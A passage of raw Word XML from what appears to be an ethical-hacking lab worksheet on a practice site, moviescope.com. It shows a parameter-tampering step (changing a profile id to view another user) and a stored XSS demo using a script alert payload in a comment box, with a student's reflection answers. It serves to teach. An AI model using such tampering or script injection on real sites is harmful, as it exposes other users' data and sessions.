        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>If</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>your</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>original</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>changing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>you should find another user’s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>profile)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C74239" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1692"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This method is what we call as Parameter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Tampering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C445A59" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1692"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Let’s move on…. Click on the Contacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654AF9C6" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1692"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>It should open up an interactive page. Isn’t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085CFB12" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1692"/>
        </w:tabs>
        <w:ind w:left="1691" w:right="1437"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>your</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>box</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-19"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>comment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-16"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>box,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="35"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>enter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-16"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="E46C0A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>&lt;script&gt; alert(“I am</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="E46C0A"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="E46C0A"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Watching”)&lt;/script)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7218A8B8" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1692"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Click</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Submit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370D8A1D" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1692"/>
        </w:tabs>
        <w:spacing w:after="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Refresh the page and click on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Contacts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D784A56" w14:textId="6B26A3A2" w:rsidR="00D02F84" w:rsidRDefault="00F83F1E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1663"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DCD511B" wp14:editId="381DD2A4">
                <wp:extent cx="5227320" cy="525780"/>
                <wp:effectExtent l="0" t="0" r="3175" b="0"/>
                <wp:docPr id="42"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27320" cy="525780"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="DADAD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3D671EF" w14:textId="223CBF8D" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                            <w:pPr>
                              <w:spacing w:line="274" w:lineRule="exact"/>
                              <w:ind w:left="28"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Record your reflection here. What did you get?</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0F8D456A" w14:textId="551D40A2" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                            <w:pPr>
                              <w:spacing w:line="274" w:lineRule="exact"/>
                              <w:ind w:left="28"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>I am Watching is now inserted into the text</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0" upright="1">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="6DCD511B" id="Text Box 27" o:spid="_x0000_s1031" type="#_x0000_t202" style="width:411.6pt;height:41.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vVxAgIAAOgDAAAOAAAAZHJzL2Uyb0RvYy54bWysU9uO0zAQfUfiHyy/07RZSldR01VptQhp&#10;YZF2+QDHcRoLx2PGbpPy9YydpqyWN4QiWeO5HM85M1nfDZ1hJ4Vegy35YjbnTFkJtbaHkn9/vn93&#10;y5kPwtbCgFUlPyvP7zZv36x7V6gcWjC1QkYg1he9K3kbgiuyzMtWdcLPwClLwQawE4GueMhqFD2h&#10;dybL5/MPWQ9YOwSpvCfvfgzyTcJvGiXDY9N4FZgpOfUW0onprOKZbdaiOKBwrZaXNsQ/dNEJbenR&#10;K9ReBMGOqP+C6rRE8NCEmYQug6bRUiUOxGYxf8XmqRVOJS4kjndXmfz/g5VfT9+Q6brk73POrOho&#10;Rs9qCOwjDCxfRX165wtKe3KUGAby05wTV+8eQP7wzMKuFfagtojQt0rU1N8iVmYvSkccH0Gq/gvU&#10;9I44BkhAQ4NdFI/kYIROczpfZxN7keRc5vnqJqeQpNgyX65u0/AyUUzVDn34pKBj0Sg50uwTujg9&#10;+BC7EcWUEh/zYHR9r41JFzxUO4PsJGhP9tv4JQKv0oyNyRZi2YgYPYlmZDZyDEM1JEVvJvUqqM/E&#10;G2FcP/pdyGgBf3HW0+qV3P88ClScmc+WtIt7Ohk4GdVkCCuptOSBs9HchXGfjw71oSXkcToWtqRv&#10;oxP1OIixi0u7tE5Jkcvqx319eU9Zf37QzW8AAAD//wMAUEsDBBQABgAIAAAAIQD77Evz2gAAAAQB&#10;AAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BS8NAEIXvgv9hGcGL2E0jlBCzKaJ4E9Tagt622WkSmp2N&#10;u9tu/PdOvdTLMMMb3vtetZzsII7oQ+9IwXyWgUBqnOmpVbD+eL4tQISoyejBESr4wQDL+vKi0qVx&#10;id7xuIqtYBMKpVbQxTiWUoamQ6vDzI1IrO2ctzry6VtpvE5sbgeZZ9lCWt0TJ3R6xMcOm/3qYDn3&#10;K82/b/avm2J8Sujx5U1+7pJS11fTwz2IiFM8P8MJn9GhZqatO5AJYlDAReLfZK3I73IQ29NSgKwr&#10;+R++/gUAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAA&#10;W0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAA&#10;AAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQATKvVxAgIAAOgDAAAOAAAAAAAAAAAA&#10;AAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQD77Evz2gAAAAQBAAAPAAAAAAAA&#10;AAAAAAAAAFwEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAYwUAAAAA&#10;" fillcolor="#dadada" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="53D671EF" w14:textId="223CBF8D" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                      <w:pPr>
                        <w:spacing w:line="274" w:lineRule="exact"/>
                        <w:ind w:left="28"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Record your reflection here. What did you get?</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0F8D456A" w14:textId="551D40A2" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                      <w:pPr>
                        <w:spacing w:line="274" w:lineRule="exact"/>
                        <w:ind w:left="28"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>I am Watching is now inserted into the text</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC889E1" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1692"/>
        </w:tabs>
        <w:spacing w:line="247" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>You should have got the message what you typed. It means you</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="18"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>have</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5E3EE6" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1692" w:right="1616"/>
      </w:pPr>
      <w:r>
        <w:t>successfully added a malicious script and the malicious link in stored in the se</w:t>
      </w:r>
      <w:r>
        <w:t>rver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9FE64E" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1692"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Login to Win Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2012.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5315A0" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1692"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>In a web browser, type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId29">
        <w:r>
          <w:rPr>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>http://www.moviescope.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="57718C6A" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1692"/>
        </w:tabs>
        <w:ind w:right="1438"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>another</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>user’s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>credentials.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(Previously,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>“A”,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>now</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>login using user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>“B”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A24B0ED" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1692"/>
        </w:tabs>
        <w:spacing w:after="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>After successful login, click</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Contacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA43596" w14:textId="517C7F1A" w:rsidR="00D02F84" w:rsidRDefault="00F83F1E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1663"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32221899" wp14:editId="3152D32F">
                <wp:extent cx="5227320" cy="701040"/>
                <wp:effectExtent l="0" t="3810" r="3175" b="0"/>
                <wp:docPr id="41"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27320" cy="701040"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="DADAD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CE697E0" w14:textId="5E455F57" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                            <w:pPr>
                              <w:spacing w:line="274" w:lineRule="exact"/>
                              <w:ind w:left="28"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
